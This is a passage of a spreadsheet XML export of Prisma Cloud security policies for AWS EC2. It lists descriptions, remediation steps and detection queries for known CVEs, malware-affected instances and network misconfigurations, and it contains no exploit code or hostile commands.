      <c r="P1827" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1827" t="inlineStr"/>
      <c r="R1827" t="inlineStr"/>
      <c r="S1827" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1827" t="b">
        <v>0</v>
      </c>
      <c r="U1827" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1827" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1827" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to authentication bypass (Privilege Escalation) with exploits in the wild [Grafana, CVE-2021-39226]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Grafana software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Grafana Snapshot Authentication Bypass [CVE-2021-39226] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X182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CVE-2021-39226
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-39226</t>
        </is>
      </c>
      <c r="Y1827" t="inlineStr"/>
      <c r="Z1827" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39226 - Grafana Snapshot authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39226'))</t>
        </is>
      </c>
      <c r="AA1827" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1827" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:32</t>
        </is>
      </c>
      <c r="AC1827" t="inlineStr"/>
      <c r="AD1827" t="b">
        <v>1</v>
      </c>
      <c r="AE1827" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1827" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>ebf549eb-7028-4be9-8ab6-bad6b2774a6d</t>
        </is>
      </c>
      <c r="AI1827" t="inlineStr">
        <is>
          <t>4fd3684b-06fe-4327-bd83-394cfb72e571</t>
        </is>
      </c>
      <c r="AJ1827" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1827" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" t="inlineStr"/>
      <c r="B1828" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1828" s="2" t="inlineStr"/>
      <c r="D1828" t="inlineStr"/>
      <c r="E1828" t="inlineStr"/>
      <c r="F1828" t="inlineStr"/>
      <c r="G1828" t="b">
        <v>1</v>
      </c>
      <c r="H18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28" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1828" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1828" t="inlineStr">
        <is>
          <t>Security group tampering risk due to malware in AWS EC2 instance with write permission over security groups</t>
        </is>
      </c>
      <c r="L1828" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1828" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1828" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1828" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1828" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1828" t="inlineStr"/>
      <c r="R1828" t="inlineStr"/>
      <c r="S1828" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1828" t="b">
        <v>0</v>
      </c>
      <c r="U1828" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1828" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1828" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware or grayware and have 'write' permission over security groups.
Security groups are used to control access to various AWS services such as RDS, EC2, and Redshift.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This enables the malware to manipulate security group rules, potentially exposing vulnerable services, leading to unauthorized access, data breaches, operational disruptions, and the creation of pathways for further infiltration within the AWS environment.
This policy checks for the following write permissions over security groups:
'rds:CreateDBSecurityGroup', 'rds:DeleteDBSecurityGroup', 'rds:RevokeDBSecurityGroupIngress', 'ec2:AuthorizeSecurityGroupEgress', 'ec2:AuthorizeSecurityGroupIngress', 'ec2:CreateSecurityGroup', 'ec2:DeleteSecurityGroup', 'ec2:ModifySecurityGroupRules', 'ec2:RevokeSecurityGroupEgress', 'ec2:RevokeSecurityGroupIngress', 'elasticloadbalancing:ApplySecurityGroupsToLoadBalancer', 'elasticloadbalancing:SetSecurityGroups', 'redshift:AuthorizeClusterSecurityGroupIngress', 'redshift:CreateClusterSecurityGroup', 'redshift:DeleteClusterSecurityGroup'
Immediate attention is required to remediate the malware or grayware reported for the instances as soon as possible and grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance.</t>
        </is>
      </c>
      <c r="X1828"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1828" t="inlineStr"/>
      <c r="Z1828" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('AWS EC2 with write permissions on security group'))</t>
        </is>
      </c>
      <c r="AA1828" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1828" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1828" t="inlineStr"/>
      <c r="AD1828" t="b">
        <v>1</v>
      </c>
      <c r="AE1828" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1828" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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28" t="inlineStr">
        <is>
          <t>ed54e180-5682-4f0a-8dd8-90c75df04134</t>
        </is>
      </c>
      <c r="AI1828" t="inlineStr">
        <is>
          <t>0a36725d-b375-4319-8968-bdc63750ffa1</t>
        </is>
      </c>
      <c r="AJ1828" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1828" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" t="inlineStr"/>
      <c r="B1829" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1829" s="2" t="inlineStr"/>
      <c r="D1829" t="inlineStr"/>
      <c r="E1829" t="inlineStr"/>
      <c r="F1829" t="inlineStr"/>
      <c r="G1829" t="b">
        <v>1</v>
      </c>
      <c r="H18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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1829" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1829" t="inlineStr">
        <is>
          <t>Remote Code Execution (Unauthenticated) risk due to publicly exposed and vulnerable AWS EC2 instance (Apache HugeGraph-Server, CVE-2024-27348)</t>
        </is>
      </c>
      <c r="L1829" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1829" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1829" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1829" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1829" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1829" t="inlineStr"/>
      <c r="R1829" t="inlineStr"/>
      <c r="S1829" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1829" t="b">
        <v>0</v>
      </c>
      <c r="U1829" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1829" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1829" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable Remote Code Execution (RCE) vulnerability (CVE-2024-27348).
CVE-2024-27348 is a critical vulnerability in Apache HugeGraph-Server that allows remote code execution (RCE). This means an attacker could potentially take control of the system if it’s running a vulnerable version of the software. The vulnerability exists because the software doesn’t properly sanitize user input, which allows attackers to inject Groovy code.
The affected software versions are Apache HugeGraph-Server versions before 1.3.0. An attacker can exploit this unauthenticated RCE via Groovy injection to take control of the system. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Remote Code Execution vulnerability on the publicly exposed AWS EC2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HugeGraph-Server (CVE-2024-27348) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1829" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported EC2 Instances based on your business requirement by modifying Security group rules to the trusted IP address
To modify Security Group rules,
1. Sign in to AWS Console
2. Navigate to EC2 Dashboard
3. Identify the EC2 instances that you want to restrict access to Internet
4. Click on Security Group attached to the instance
5. Update inbound rules that allow Internet access (0.0.0.0/0) to the trusted IP address
   Refer to the following link for detailed steps to modify security group rules,
   https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/working-with-security-groups.html#updating-security-group-rules
NOTE: When modifying Security group rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27348</t>
        </is>
      </c>
      <c r="Y1829" t="inlineStr"/>
      <c r="Z1829" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27348'))</t>
        </is>
      </c>
      <c r="AA1829" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1829" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:45</t>
        </is>
      </c>
      <c r="AC1829" t="inlineStr"/>
      <c r="AD1829" t="b">
        <v>1</v>
      </c>
      <c r="AE1829" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1829" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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29" t="inlineStr">
        <is>
          <t>cfd144d8-69a7-43b2-9efb-6f9f9c1a925e</t>
        </is>
      </c>
      <c r="AI1829" t="inlineStr">
        <is>
          <t>f7b07ee1-64c8-4bf2-a895-d2d662862519</t>
        </is>
      </c>
      <c r="AJ1829" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1829" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1830" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1830" s="2" t="inlineStr"/>
      <c r="D1830" t="inlineStr"/>
      <c r="E1830" t="inlineStr"/>
      <c r="F1830" t="inlineStr"/>
      <c r="G1830" t="b">
        <v>1</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1830" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1830" t="inlineStr">
        <is>
          <t>AWS Network ACL is not in use</t>
        </is>
      </c>
      <c r="L1830" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1830" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1830" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1830" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1830" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1830" t="inlineStr">
        <is>
          <t>Asset Management</t>
        </is>
      </c>
      <c r="R1830" t="inlineStr">
        <is>
          <t>AST-02.5:Network Access Control (NAC)</t>
        </is>
      </c>
      <c r="S1830" t="inlineStr"/>
      <c r="T1830" t="b">
        <v>0</v>
      </c>
      <c r="U1830" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1830" t="inlineStr">
        <is>
          <t>aws-ec2-describe-network-acls</t>
        </is>
      </c>
      <c r="W1830" t="inlineStr">
        <is>
          <t>This policy identifies AWS Network ACLs that are not in use. 
AWS Network Access Control Lists (NACLs) serve as a firewall mechanism to regulate traffic flow within and outside VPC subnets. A recommended practice is to assign NACLs to specific subnets to effectively manage network traffic. Unassigned NACLs with inadequate rules might inadvertently get linked to subnets, posing a security risk by potentially allowing unauthorized access.
It is recommended to regularly review and remove unused and inadequate NACLs to improve security, network performance, and resource management.</t>
        </is>
      </c>
      <c r="X1830" t="inlineStr">
        <is>
          <t>To attach an AWS Network Access Control List (NACL) to a subnet, follow these steps: 
1. Sign into the AWS console and navigate to the Amazon VPC console. 
2. In the navigation pane, choose 'Network ACLs' under the 'Security' section. 
3. Select the NACL that you want to attach to a subnet. 
4. Choose the 'Actions' button, then select 'Edit subnet associations'. 
5. In the 'Edit subnet associations' dialogue box, select the subnet(s) that you want to associate with the NACL. 
6. Choose 'Save' to apply the changes. 
To delete a non-default AWS Network Access Control List (NACL), follow these steps: 
1. Sign into the AWS console and navigate to the Amazon VPC console. 
2. In the navigation pane, choose 'Network ACLs' under the 'Security' section. 
3. Select the NACL that you want to delete. 
4. Choose the 'Actions' button, then select 'Delete network ACL'. 
5. Confirm the deletion when prompted. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets</t>
        </is>
      </c>
      <c r="Y1830" t="inlineStr"/>
      <c r="Z1830" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-network-acls' AND json.rule = associations[*] size less than 1
{"category":"Networking","resourceTypes":["aws_network_acl","aws_subnet"]}</t>
        </is>
      </c>
      <c r="AA1830" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1830" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1830" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-1149-CKV2_AWS_1</t>
        </is>
      </c>
      <c r="AD1830" t="b">
        <v>1</v>
      </c>
      <c r="AE1830" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1830" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>8eaf1a60-fe3f-4931-a8d4-fa8e84982f94</t>
        </is>
      </c>
      <c r="AI1830" t="inlineStr">
        <is>
          <t>96e722ed-6d1d-4144-a997-81be0f6d5b18</t>
        </is>
      </c>
      <c r="AJ1830" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1830" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Insurance Regulatory And Development Authority Of India, ITSG-33, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS v2.0.0 (AWS) - Level 1, Secure Controls Framework (SCF) - 2024.2, ITSG-33, TX-RAMP Level 1, TX-RAMP Level 2, CIS v3.0.0 (AWS) Level 1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1831" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1831" s="2" t="inlineStr"/>
      <c r="D1831" t="n">
        <v>0</v>
      </c>
      <c r="E1831" t="n">
        <v>0</v>
      </c>
      <c r="F1831" t="n">
        <v>841</v>
      </c>
      <c r="G1831" t="b">
        <v>1</v>
      </c>
      <c r="H18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31" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1831" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1831" t="inlineStr">
        <is>
          <t>AWS Network ACLs allow ingress traffic on Admin ports 22/3389</t>
        </is>
      </c>
      <c r="L1831" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1831" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1831" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1831" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1831" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1831" t="inlineStr">
        <is>
          <t>Vulnerability &amp; Patch Management</t>
        </is>
      </c>
      <c r="R1831" t="inlineStr">
        <is>
          <t>VPM-06:Vulnerability Scanning</t>
        </is>
      </c>
      <c r="S1831" t="inlineStr"/>
      <c r="T1831" t="b">
        <v>0</v>
      </c>
      <c r="U1831" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1831" t="inlineStr">
        <is>
          <t>aws-ec2-describe-network-acls</t>
        </is>
      </c>
      <c r="W1831" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Network Access Control List (NACL) which has a rule to allow ingress traffic to server administration ports.
AWS NACL provides filtering of ingress and egress network traffic to AWS resources. Allowing ingress traffic on admin ports 22 (SSH) and 3389 (RDP) via AWS Network ACLs increases the vulnerability of EC2 instances and other network resources to unauthorized access and cyberattacks.
It is recommended that no NACL allows unrestricted ingress access to server administration ports, such as SSH port 22 and RDP port 3389.
NOTE: This policy may report NACLs, which include the deny policy in the rule set. Make sure while remediating the rule set does not consist of the Allow and Deny rule set together; which leads to overlap on each ruleset.</t>
        </is>
      </c>
      <c r="X1831" t="inlineStr">
        <is>
          <t>To update the AWS Network Access Control List perform the following actions:
1. Sign into the AWS console and navigate to the Amazon VPC console. 
2. In the navigation pane, choose 'Network ACLs' under the 'Security' section.
3. Select the reported Network ACL
4. Click on 'Actions' and select 'Edit inbound rules'
5. Click on Delete towards the right of rule which has source '0.0.0.0/0' or '::/0' and shows 'ALLOW and 'Port Range' which includes port 22 or 3389 or 'Port Range' shows 'ALL'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1831" t="inlineStr"/>
      <c r="Z1831" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-network-acls' AND json.rule = "entries[?any(egress equals false and ((protocol equals 6 and ((portRange.to equals 22 or portRange.to equals 3389 or portRange.from equals 22 or portRange.from equals 3389) or (portRange.to &gt; 22 and portRange.from &lt; 22) or (portRange.to &gt; 3389 and portRange.from &lt; 3389))) or protocol equals -1) and (cidrBlock equals 0.0.0.0/0 or ipv6CidrBlock equals ::/0) and ruleAction equals allow)] exists"</t>
        </is>
      </c>
      <c r="AA1831" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1831" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1831" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-1236</t>
        </is>
      </c>
      <c r="AD1831" t="b">
        <v>1</v>
      </c>
      <c r="AE1831" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1831" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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31" t="inlineStr">
        <is>
          <t>ef2ff694-4467-4db0-8224-ccbcab070aad</t>
        </is>
      </c>
      <c r="AI1831" t="inlineStr">
        <is>
          <t>50b677f4-4f8f-459d-80d1-1d694662597a</t>
        </is>
      </c>
      <c r="AJ1831" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1831" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, MLPS 2.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, PCI DSS v3.2.1, ACSC Information Security Manual (ISM), CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-172, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1832" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1832" s="2" t="inlineStr"/>
      <c r="D1832" t="inlineStr"/>
      <c r="E1832" t="inlineStr"/>
      <c r="F1832" t="inlineStr"/>
      <c r="G1832" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1832" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1832" t="inlineStr">
        <is>
          <t>AWS NAT Gateways are not being utilized for the default route</t>
        </is>
      </c>
      <c r="L1832" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M1832" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1832" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1832" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1832" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1832" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R1832" t="inlineStr">
        <is>
          <t>ISM-1271</t>
        </is>
      </c>
      <c r="S1832" t="inlineStr"/>
      <c r="T1832" t="b">
        <v>0</v>
      </c>
      <c r="U1832" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1832" t="inlineStr">
        <is>
          <t>aws-ec2-describe-route-tables</t>
        </is>
      </c>
      <c r="W1832" t="inlineStr">
        <is>
          <t>This policy identifies Route Tables which have NAT instances for the default route instead of NAT gateways. It is recommended to use NAT gateways as the AWS managed NAT Gateway provides a scalable and resilient method for allowing outbound internet traffic from your private VPC subnets.</t>
        </is>
      </c>
      <c r="X1832" t="inlineStr">
        <is>
          <t>To create a NAT gateway:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to VPC Dashboard
4. In the navigation pane, choose 'NAT Gateways'
5. Click on 'Create NAT Gateway', Specify the subnet in which to create the NAT gateway, and select the allocation ID of an Elastic IP address to associate with the NAT gateway. When you're done, Click on 'Create a NAT Gateway'. The NAT gateway displays in the console. After a few moments, its status changes to Available, after which it's ready for you to use.
To update Route Table:
After you've created your NAT gateway, you must update your route tables for your private subnets to point internet traffic to the NAT gateway. We use the most specific route that matches the traffic to determine how to route the traffic.
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to VPC Dashboard
4. In the navigation pane, choose 'Route Tables'
5. Select the reported route table associated with your private subnet 
6. Choose 'Routes' and Click on 'Edit routes'
7. Replace the current route that points to the NAT instance with a route to the NAT gateway
8. Click on 'Save routes'</t>
        </is>
      </c>
      <c r="Y1832" t="inlineStr"/>
      <c r="Z1832" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-route-tables' AND json.rule = "routes[?(@.state == 'active' &amp;&amp; @.instanceId)].destinationCidrBlock contains 0.0.0.0/0"</t>
        </is>
      </c>
      <c r="AA1832" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1832" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1832" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-258</t>
        </is>
      </c>
      <c r="AD1832" t="b">
        <v>1</v>
      </c>
      <c r="AE1832" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1832" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>bbfd1fec-c777-4265-a307-fbca4a5912e7</t>
        </is>
      </c>
      <c r="AI1832" t="inlineStr">
        <is>
          <t>06db4527-44f4-4618-8d06-998e9fc0c240</t>
        </is>
      </c>
      <c r="AJ1832" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1832" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MAS TRM 2021, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, MLPS 2.0, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, NYDFS 23 CRR-NY 500.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, CIS v1.4.0 (AWS), ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO 27002:2022, Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), MAS TRM 2021, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v3.0.0 (AWS) Level 2, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO/IEC 27017:2015, ISO 27002:2022, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO 27002:2022, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, CIS v1.3.0 (AWS), ISO/IEC 27002:2013, CIS Controls v8.1, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, NIST CSF, CIS v1.2.0 (AWS), CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, CIS Controls v7.1, NIST SP 800-171 Revision 3, Fedramp (Moderate), CIS 